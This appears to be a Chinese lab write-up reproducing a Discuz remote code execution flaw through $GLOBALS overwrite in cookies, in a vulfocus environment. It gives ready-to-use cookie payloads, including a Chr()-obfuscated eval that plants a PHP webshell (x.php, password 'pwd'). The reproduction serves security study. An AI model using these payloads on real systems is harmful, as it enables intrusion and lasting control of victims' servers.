vulfocus——discuz命令执行(wooyun-2010-080723)
描述
由于php5.3.x版本里php.ini的设置里request_order默认值为GP, 导致$_REQUEST中不再包含$_COOKIE, 我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。
如PHP中的system、exec、shell_exec、passthru、popen、proc_popen等,当用户能控制这些函数中的参数时,就可以将恶意系统命令拼接到正常命令中,从而造成命令执行攻击,这就是命令执行漏洞。
复现
1.打开web页面
2.找到一个帖子,然后用burp suite抓包
3.将Cookie内的内容修改为:
GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();
4.发现以上命令执行成功,进行写入shell的操作:
GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=eval(Chr(102).Chr(112).Chr(117).Chr(116).Chr(115).Chr(40).Chr(102).Chr(111).Chr(112).Chr(101).Chr(110).Chr(40).Chr(39).Chr(120).Chr(46).Chr(112).Chr(104).Chr(112).Chr(39).Chr(44).Chr(39).Chr(119).Chr(39).Chr(41).Chr(44).Chr(39).Chr(60).Chr(63).Chr(112).Chr(104).Chr(112).Chr(32).Chr(64).Chr(101).Chr(118).Chr(97).Chr(108).Chr(40).Chr(36).Chr(95).Chr(80).Chr(79).Chr(83).Chr(84).Chr(91).Chr(112).Chr(119).Chr(100).Chr(93).Chr(41).Chr(63).Chr(62).Chr(39).Chr(41).Chr(59))
5.访问一下x.php文件
6.在上述代码中,文件为:x.php 密码为: pwd
vulfocus——discuz命令执行(wooyun-2010-080723)相关推荐
- couchdb 任意命令执行漏洞 cve-2017-12636
Couchdb简介: Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库".它是一个使用JSON作为存储格式,JavaScript作为查询语言 ...
- couchdb 任意命令执行漏洞(cve-2017-12636)
Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库".它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和 ...
- php禁用了所有命令执行的函数 怎么搞,PHP通过bypass disable functions执行系统命令的方法汇总...
一.为什么要bypass disable functions 为了安全起见,很多运维人员会禁用PHP的一些"危险"函数,例如eval.exec.system等,将其写在php.in ...
- PHP-代码审计-命令执行
当你的才华 还撑不起你的野心时 那你就应该静下心来学习 代码审计学习线上实验,都是CE一边实操,一边整理的笔记,方便以后翻看时,可快速查阅. 目录 命令注入漏洞产生的原因 简介 相关函数 命令注入漏洞 ...
- DiscuzX系列命令执行分析公开(三连弹)
tang3 · 2015/01/15 18:55 0x00 漏洞概要 昨天360补天发了这样的一条微博: 然后打听了一下细节,发现居然是我13年7月报给TSRC的漏洞,看今天大家玩的挺开心,与TSRC ...
- 又被野外利用了!新曝光Office产品多个远程命令执行漏洞分析
本文讲的是又被野外利用了!新曝光Office产品多个远程命令执行漏洞分析, 早在2015年,FireEye曾发布过两次关于Office的Encapsulated PostScript (EPS)图形文 ...
- GoAhead远程命令执行漏洞(CVE-2021-42342)
GoAhead远程命令执行漏洞(CVE-2021-42342) 目录 GoAhead远程命令执行漏洞(CVE-2021-42342) 漏洞描述 漏洞复现 启动环境 复现漏洞 漏洞描述 漏洞主要是由于上 ...
- Struts2 S2-016/S2-017 命令执行带回显、看web路径、getshell e...
大家都发了,,我就整理了一下.友情提示,自己小命比shell重要哦.. 喜欢就点一下感谢吧^_^ 带回显命令执行: http://www.example.com/struts2-blank/examp ...
- 代码审计-dubbo admin =2.6.1远程命令执行漏洞
前置 输入材料 安全目标和需求 架构分析 供应链安全 源代码审查 依赖结构矩阵(Dependency Structure Matrices,DSM) 数据流 信任边界 数据存贮 威胁列表 otter ...
最新文章
- 天命剑之天命的含义--天行有悖,乃命羲和。
- Oracle新一代数据库机 助所有规模企业迈向云端
- Java 获取本机IP和Mac以及网卡信息
- 蓝牙模块怎么指定查询另一个蓝牙模块_蓝牙模块以IPEX端口外接天线、PCB板载天线最为常见...
- 多媒体技术创新与难点探索(内附讲师资料下载)
- 奥特曼传奇英雄存档丢了怎么找回_热血传奇:道士最帅武器—玄天
- iOS IM开发建议(一)App框架设计
- pat04-树7. Search in a Binary Search Tree (25)
- 20190925 On Java8 第二十二章 枚举
- Java--工厂模式
- [转]C#.NET中动态添加与删除控件
- 阶段5 3.微服务项目【学成在线】_day01 搭建环境 CMS服务端开发_14-MongoDb入门-文档...
- python调用adb shell命令_python(或BAT脚本)自动执行adb shell以后的命令
- POJ3258River Hopscotch(二分)
- 深度学习入门(鱼书)学习笔记
- CADD课程学习(12)-- 基于碎片的药物设计(MOE)
- 系统测试——测试用例设计
- 用友U8供应链期初数据录入案例教程2
- 地图 Api 使用小记 (use 51ditu)
- List集合中 中contains方法的使用详解